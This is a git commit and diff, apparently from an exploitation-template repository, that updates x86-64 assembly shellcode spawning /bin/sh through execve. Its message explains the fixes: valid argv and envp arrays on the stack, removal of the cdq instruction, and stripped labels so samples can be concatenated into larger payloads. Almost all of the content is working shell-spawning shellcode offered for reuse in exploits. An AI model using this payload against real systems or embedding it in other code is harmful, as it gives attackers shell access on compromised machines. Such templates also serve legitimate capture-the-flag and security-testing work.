shellcode: Update /bin/sh shellcodes

The shell-spawning shellcodes are rewritten to address the following
concerns:

    - The array parameters to execve are now set properly, to valid
      arrays on the stack, instead of NULL pointers.

    - The cdq instruction is no longer used to sign-extend the rax
      register, since it has not been producing the expected results in
      gdb.

    - Labels, sections, and other file metadata are removed in order to
      support concatenation of shellcode samples to make more complex
      code.

Signed-off-by: Malfurious <m@lfurio.us>

1 files changed, 22 insertions, 14 deletions

diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
 
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+;     ┏━━━━━━━━━━━━━━┓
+;     ┃              v
+;   [ argv0, NULL ] "/bin//sh" NULL
+;     ^      ^       ^
+;     ┃      ┃       ┃
+;     argv   envp    filename
 
-_start:
-    xor     rsi, rsi
-    xor     rdx, rdx
-    push    rsi
-    mov     rdi, 0x68732f2f6e69622f
-    push    rdi
-    push    rsp
-    pop     rdi
-    mov      al, 0x3b
-    cdq
-    syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor     rax, rax
+xor     rsi, rsi
+mov     rdi, 0x68732f2f6e69622f
+push    rsi
+push    rdi
+mov     rdi, rsp
+push    rsi
+mov     rdx, rsp
+push    rdi
+mov     rsi, rsp
+mov      al, 59
+syscall